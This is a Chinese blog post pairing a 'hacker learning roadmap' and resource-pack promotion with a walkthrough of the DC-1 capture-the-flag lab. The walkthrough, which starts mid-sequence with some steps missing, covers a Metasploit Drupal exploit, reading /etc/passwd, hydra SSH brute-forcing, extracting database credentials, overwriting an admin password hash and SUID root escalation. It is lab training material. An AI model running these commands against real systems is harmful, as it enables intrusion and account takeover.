最新DC系列靶机1通关教程_dc1 靶机(2)，跟网络安全初学者分享几点经验

最新推荐文章于 2024-05-14 19:21:29 发布

2401_84264610

最新推荐文章于 2024-05-14 19:21:29 发布

阅读量945

点赞数 15

分类专栏：程序员文章标签： web安全安全

本文链接：https://blog.csdn.net/2401_84264610/article/details/138593644

版权

程序员专栏收录该内容

192 篇文章 5 订阅

订阅专栏

如何自学黑客&网络安全

黑客零基础入门学习路线&规划

初级黑客
1、网络安全理论知识（2天）
①了解行业相关背景，前景，确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。（非常重要）

2、渗透测试基础（一周）
①渗透测试的流程、分类、标准
②信息收集技术：主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察
④主机攻防演练：MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础（一周）
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全（系统入侵排查/系统加固基础）

4、计算机网络基础（一周）
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析（HTTP、TCP/IP、ARP等）
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御：主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作（2天）
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透（1周）
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏扫等）
恭喜你，如果学到这里，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web 渗透、安全服务、安全分析等岗位；如果等保模块学的好，还可以从事等保工程师。薪资区间6k-15k

到此为止，大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗？

如果你想要入坑黑客&网络安全，笔者给大家准备了一份：282G全网最全的网络安全资料包评论区留言即可领取！

7、脚本编程（初级/中级/高级）
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中，想要高效地使用自制的脚本工具来实现各种目的，更是需要拥有编程能力.

如果你零基础入门，笔者建议选择脚本语言Python/PHP/Go/Java中的一种，对常用库进行编程学习；搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP， IDE强烈推荐Sublime；·Python编程学习，学习内容包含：语法、正则、文件、网络、多线程等常用库，推荐《Python核心编程》，不要看完；·用Python编写漏洞的exp,然后写一个简单的网络爬虫；·PHP基本语法学习并书写一个简单的博客系统；熟悉MVC架构，并试着学习一个PHP框架或者Python框架 (可选)；·了解Bootstrap的布局或者CSS。

8、超级黑客
这部分内容对零基础的同学来说还比较遥远，就不展开细说了，附上学习路线。

网络安全工程师企业级学习路线

如图片过大被平台压缩导致看不清的话，评论区点赞和评论区留言获取吧。我都会回复的

视频配套资料&国内外网安书籍、文档&工具

当然除了有配套的视频，同时也为大家整理了各种文档和书籍资料&工具，并且已经帮大家分好类了。

一些笔者自己买的、其他平台白嫖不到的视频教程。

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

启动msfconsole，搜索search Drupal

5.使用第二个漏洞：use2，使用show missing查看一下必须要设置的选项

看到需要设置rhosts，rhosts就是设置靶机的IP地址

6.使用set 设置：set rhosts 192.168.16.153

使用 show options查看设置好的信息

7. 确认设置的信息后输入run开始执行攻击，

meterpreter：是一个用于远程控制计算机的工具，它可以在目标计算机上执行命令、上传和下载文件、截取屏幕等操作。它是Metasploit框架中的一个模块，通常用于渗透测试和漏洞利用。

8.使用ls查看当前目录下所有文件，发现第一个flag 1.txt

**ls：**查看当前目录下所有文件，找到第一个flag后查看内容，cat flag1.txt

9.查看一下靶机的用户，发现有个flag4的用户：cat /etc/passwd

/etc/passwd:存储系统用户账户的信息。

10.使用九头蛇（hydra）来爆破看看是否能拿到密码orange：hydra -l flag4 -P /usr/share/john/password.lst 192.168.16.153 ssh**/usr/share/john/** 是 John the Ripper密码破解工具的默认安装目录。指定攻击的类型是ssh

通过SSH连接到flag4用户使用flag4账户和密码ssh连接用户：ssh flag4@192.168.16.153

12.ls找到了flag4.txt，从而可知还有两个flag还未找到，有可能在web上，因为有开放web服务

13.已经登录进了靶机，查看web的配置文件，因为drupal的配置文件在var/www下的/sites/default/settings.php(百度可知)，先进入var/www ：cd /var/www

14.查看/sites/default/settings.php，在配置中看到了flag2还有数据库的信息：数据库的账号：dbuser密码：R0ck3t数据库是：MySQL

more sites/default/settings.php #批量查看

15.连接数据库：mysql -u dbuser -p

16.查看数据库：show databases;

使用drupaldb数据库：use drupaldb;

18.查看数据表：show tables;

19.查看user中数据，看到了管理员的密码，但是是哈希值：select * from users;

退出数据库，搜索passwd，quit：退出数据库看到/var/www/scripts下有password-hash.sh：find / -name password*

21.尝试执行password-hash.sh ：scripts/password-hash.sh

尝试在后面加上密码生成哈希值

得到哈希值，将哈希值替换原来admin的哈希值：

update users set pass='$S$DoGwUA2Mz3604jbP.rBfrPDDJEzRorCxOMOtWBDnEuW4a1/56GLk
' where name='admin';

24.在web界面尝试登录，找到flag3

25.提权：find -name flag4.txt -exec /bin/bash -p ;

这个命令是用于在当前目录及其子录中查找名为 “flag4.txt” 的文件，并且在找到每个文件后执行 /bin/bash -p 命令。每个部分的含义：

find：这是一个用于在文件系统中搜索文件和目录的命令。
-name flag4.txt：这是 find 命令的选项之一，用于指定要搜索的文件名为 “flag4.txt”。
-exec：这也是 find 命令的选项之一，它允许在找到每个文件后执行指定的命令。
/bin/bash -p：这是要执行的命令。/bin/bash 是一个常见的 Unix/Linux shell，而 -p 选项表示以特权（即以 root 用户）运行 bash。这将打开一个交互式 shell 环境，具有 root 用户权限。